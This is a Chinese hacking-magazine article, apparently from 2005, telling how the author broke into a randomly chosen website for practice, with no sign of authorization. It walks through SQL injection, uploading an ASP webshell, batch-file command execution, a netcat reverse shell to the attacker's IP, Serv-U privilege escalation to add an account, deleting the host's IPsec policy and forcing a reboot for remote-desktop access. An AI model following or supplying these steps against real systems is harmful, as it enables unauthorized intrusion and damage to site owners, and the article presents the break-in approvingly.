注意：本文已发表在《黑客X档案》2005年第二期上。转载请注明出处 

    一次艰苦的6个小时的渗透过程 

  这些天总觉得闷的慌，想到自己很久很久没有在实战中练习渗透了。于是到网上随便找了一个站点，深吸一口气：渗透开始了。 
  一边拿着SUPERSCAN扫描端口,一边在站点上转转，发现几个SQL注入的漏洞，是MSSQL的数据库却是都无法成功，大概是ASP的写法和我所使用的注入语句不一样吧，于是我把NBSI2祭了出来，左右扫了一下，发现几个没有发现的注入点，猜解之后不出我所料的是DB_OWNER用户,没什么权限,接着猜解，发现一个MANAGE_USER的表,得到了几个管理员用户.然后随手在网址后面加个Admin,居然跳出了后台管理.于是写上破解的用户名和密码就登入成功了.一切看起来都是那么顺利和自然.这时候SuperScan的扫描结果出来了,只开了个80端口.估计是做了TCP/IP筛选。这个好解决，呵呵。 
  在后台转转,一眼就看到了一个上传文件的页面,试一下上传一个ASP程序吧.等了几秒种,居然提示成功了!一会儿时间楞是没晃过神儿来。 
  这个时候我心里琢磨着这站点太容易进了吧,再渗透下去大概就没什么意思了,索性放弃去找另外的机器练手.但是当我浏览一下这个站点的C盘的时候发现管理员居然做了权限设置,(图1).嘿嘿~我心里想着这站点好玩,有点想拿下他的意思. 
  在ASP木马里浏览了一下,发现这台主机的设置还是比较变态的:C盘D盘E盘都没有办法浏览,F盘是存放网页的地方,设置的权限看起来像EVERYONE,再仔细看了一下，管理员禁止了WSH，看来执行文件应该有点麻烦了。不过起码还有一点让我感到庆幸的就是有FSO和一个盘可以用用，自我感觉还是蛮不错的。 
  现在有了WEBSHELL，我就开始提升权限，本来打算是想用海阳2005的搜索功能在F盘下面搜索SQL的用户和密码的，可是找到了几个站点的Conn.asp文件，发现原来SQL并不连接在本机上，而是远程主机，再说都不是SYSADMIN的用户，拿到了也没什么用处。哎，这么拽，想提升权限都麻烦啊。再试了试SHELL.APPLICATION,发现程序是能够执行的,可是不能加参数也不能回显结果,似乎就没有什么用了.后来才明白这么一个弱知的想法害我走了不少弯路. 
  渗透到这里我感觉有点麻烦了，于是到QQ上叫了lcx和他讨论解决办法，Lcx简单的了解到了主机的设置以后,很简单的说了告诉我写个批处理就能执行带参数的命令了,至于结果,用定向符输出到F:\下的文件里去就可以了.看到这里,我一拍脑门:绝啊,我怎么没想到呢？ 
  首先用海阳2005ASP木马在F:\下建立一个BAT文件.想想再怎么也起码要看一下系统的用户吧.于是写上NET USER >> F:\A.TXT 
  然后用SHELL.APPLICATION执行一下,再回到FSO页面刷新一下,诶?怎么没有生成A.TXT?大概是管理员设置了USERS的帐户不能访问CMD.EXE吧.于是我从自己的机器上上传了一个CMD.EXE到F:\下面然后写上f:\cmd.exe /c net user >>f:\a.txt.执行以后果然在F:\盘下多了一个A.TXT,看来我的猜想没有错.看一下,管理员用策略组把用户改的BT级了，没办法，再看下开了什么端口，发现主机除了开了80端口以外还开了21和3389，令人瞠目的是这个21端口上面居然还有人连接？不会吧？我怎么什么都没扫到？于是试着登入FTP，结果拒绝连接。怪了。 
  正面不行我干脆反着来，就算你做了TCP/IP筛选你也是对本机做的，对外连接你不行吧。恩，传了个NC上去，然后修改那个BAT文件：f:\nc.exe myip 1986 -e f:\cmd.exe，执行了以后我就做在电脑前等这个反向连接过来的SHELL，可是等了半天NC的监听端口上什么反映都没有。靠！难道是传说中的硬件防火墙？ 
  这下似乎没辙了。无奈之下看了看端口列表，发现127.0.0.1这个端口对应着43958端口(图2)。恩？这个不是SERV-U的本地管理端口吗？刚好手上有个SERVU的权限提升工具，一样传上去简单的执行一句添加NT用户的命令，再看一下，果然添加成功。不错。那么现在我来看看那几个被设置权限的盘吧。经过几次的执行，结果再次摧毁了我的意志，管理员把SYSTEM用户也给禁止了，试了试CACLS，照样不行。真郁闷。现在权限是有了，但是没有端口。没有其他什么东西可以给我控制，真是欲哭无泪。 
  这个时候LCX给我了提示说可以用VIDC反连过来或者是HACKER’S DOOR这样的后门.折腾了半天终于把东西传上去执行了,可是根本成功,VIDC连不了,HACKER’S DOOR更是没办法成功.好家伙,真是个难搞的种子啊,玩了两年半安全第一次碰到这么BT的主机。真的有点想放弃了。一看时间，过去4个多小时，除了权限能提升一点以外其他的都毫无进展，还是仔细的看一下这个F盘上还有什么好东西吧。 
  带着点绝望的色彩，我翻开一个又一个的目录，可是就是这样百无聊赖的寻找，还真给我找到一个好东西。主机上竟然有个"农贸服务器安全配置.ipsec"。这个IPSEC文件是什么，难道是IP安全策略文件？这台主机不会是用的IP策略吧。想想也是蛮有可能的，匆忙将这个文件下载到本地，在MMC.EXE添加一个管理单元，再添加一个IP安全策略，把这个文件导入:哈!果然不出我所了,一个叫"公司"的安全策略出现了(图3),接着一层层的打开他，发现做的真是BT，让我大饱了眼福啊，从SYN到ICMP都做了过滤了。学了不少东西。呵呵 
  研究了一下这个文件，我就开始猜想是不是对方的主机上也指派着这样一个安全策略呢？把他删除了，那么这台主机对着我就是在网络上裸奔了。呵呵。赶紧在本机上安装了一个Windows 200 Resource Kit，然后把其中的IPSECPOL.EXE、IPSECUTIL.DLL 、TEXT2POL.DLL提取出来传到这台主机上。这3个文件是在命令行下操作IPSEC的工具，我们只用它来删除这个安全指派。再编辑一次BAT文件用SERV-U的权限提升工具执行这条命令：ipsecpol -w REG -p "公司" -o ，如果不出以外的话这个名为"公司"的安全策略已经被删除掉了。那么现在唯一要做的工作就是重新启动系统，然后从终端服务登入上去。哈！越想越开心，最后编辑一次那个BAT文件，用IISRESET /REBOOT命令，然后执行。过了不多久网页就没办法访问了，看来是重启了。兴奋ing。 
  经过短暂而又漫长的等待之后，在键盘的F5键的不断触动下，IE慢吞吞的返回了站点的首页，这个时候我再用终端连接上去，哇哈~成功了(图4)，我差点就从椅子上蹦起来。使用刚才添加的帐户登入，看了看主机的大致情况，发现除了F盘，其余的盘都设置只能由Administrator这个用户访问。真BT啊，这次渗透的确让我了解了不少东西，比如这个IPSEC设置，虽然是BT中的BT，但是管理员唯一的错误就是把这个文件给备份到了一个拥有Everyone权限的盘上，呵呵。不知道是粗心还是什么，的确是他的失策啊。6个小时的入侵就这么结束了，想想起来真是回味无穷，至于以后的事情，估计我在这么BT的管理员手下活不了多长时间，还是就此撒手比较合得来，呵呵。 

OVER